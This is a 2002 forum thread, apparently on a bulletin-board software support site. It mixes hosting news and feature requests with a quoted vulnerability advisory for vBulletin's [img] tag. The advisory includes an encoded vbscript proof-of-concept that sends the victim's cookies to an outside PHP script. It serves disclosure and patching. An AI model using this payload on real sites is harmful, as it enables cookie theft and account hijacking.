This morning, I tested out the latest security vulnerabilities that are effecting vBulletin & Ikonboard (announced last week) on my SE and SP1 installations.

I am pleased to report that both are secure and are not effected by this!!

Now that I shared this good news with you, share some with me... how is that v1.3 coming?  

What are the new vulnerabilities that plague those systems?

Also, your host altered their TOS?  How so?

Quote from: Jeff Lewis on March 26, 2002, 02:29:55 AMWhat are the new vulnerabilities that plague those systems?

vBulletin
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
 
Version(s): prior to 2.2.3
 
Description:  A vulnerability was reported in the vBulletin bulletin board software. A remote user can conduct cross-site scripting attacks against other vBulletin users.

It is reported that a remote user can inject scripting code in posts and in private messages within an IMG tag (which is apparently enabled, by default). When the target (victim) user views the message, the code will be executed on the target user's browser. The code will originate from the system running vBulletin and will run in the security context of that system. As a result, the code will be able to access the target user's cookies associated with the vBulletin site.

Some demonstration exploit code is included in the Source Message (below).

QuoteHi

I've discovered a vulnerability in the vBulletins's [img]-Tag
implementation,
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser)
It is enclosed in codeTag, the url is encoded in ascii and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags

['img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)['/img]
 

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [iimg] tag,
            as well as requiring it to start with http://".
            Sounds good


 vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still sites using vulnerable versions, so better update!  

 
Impact:  A remote user can cause arbitrary javascript to be executed in a target user's browser. The code will be able to access the target user's cookies associated with the site running the vBulletin software.
 
Solution:  The vendor has reportedly released a fixed version (2.2.4). See the Vendor URL for more information.

Ok, I was on zeroth.net.  They did message board hosting (think clear back.. to the beginning of the year).  They went down, lost their server... actually, they came back in February, and I noticed that, so I asked about the boards and such that they used to host.  They said that they were going to change a few things, mainly get rid of the forum hosting and go to full website hosting.  They wanted to test out a few things, so they said I could transfer my websites over there and give their servers a small testing.  One my accounts were up, I would be able to keep them.  That was February 20th or so...  Zeroth would look over any website you wanted to place on their servers to make sure they had some promise before you could transfer over there.  Seems like a good plan for a free host, in order not to be killed by 100000000 websites being created
They switiched their URL's over to www.zeroth.cc, and my websites switched respectively.  The www.zeroth.net was going to point over to www.zeroth.cc sooner or later, when their website was created (they were going to recreate it to make it look a bit better).

Now, I was informed that their website was up and that they are going "live" now.  Checked out the website, read the text on the front page...
Well, that means I'm out of a web host all of a sudden.  So much for that idea.  If you are all that curious, check out the front page.

I e-mailed the host of the server, told him of the news, I should get a few weeks to transfer to another server... if I can find one...

Sidenote: Google has a cached version of the now defunct plan to add websites at Zeroth.
<< Click here to see >>
(note: my account had some leeway, being the first...  I didn't need a domain, I could have sitename.zeroth.cc just fine)

Sidenote II (because I always add more than 2 cents):  I didn't think the forums was updated yet (for member support back when zeroth hosted forums).  I am right, the profile of the admin still shows zeroth as a forum hosting place!  
<< That is here >>

Both sites had a URL cloak on them... don't think there will be much negative effect other than the lost server...

One was my personal site (which wasn't done much and which had Distortion Forums)

The other was a website for my High School marching band, and since I am a senior I will soon have no control of that...

Certainly not good publicity for either of them, hopefully the URL cloak helped...

Interesting...

Got an e-mail from Zeroth, said they wouldn't cancel my accounts for any reason, mainly because I was there so long (as well as the fact that they want to keep the sites they have been hosting so long).  They updated their mainpage to show this...

Well, seems like I still have a host...  better keep URL cloaking on...

how about a way to view it in thread mode

message1
  >reply to message1

message2
  >reply1 to message2
     >reply to reply1 to message2

Quote from: bigfoot on March 26, 2002, 10:40:47 PMhow about being able to remove old messages from certian groups example
group 1 remove after 30 days
group 2 remove after 15 days

and so on..

Why would you put a link to a picture in your profile that requires a password?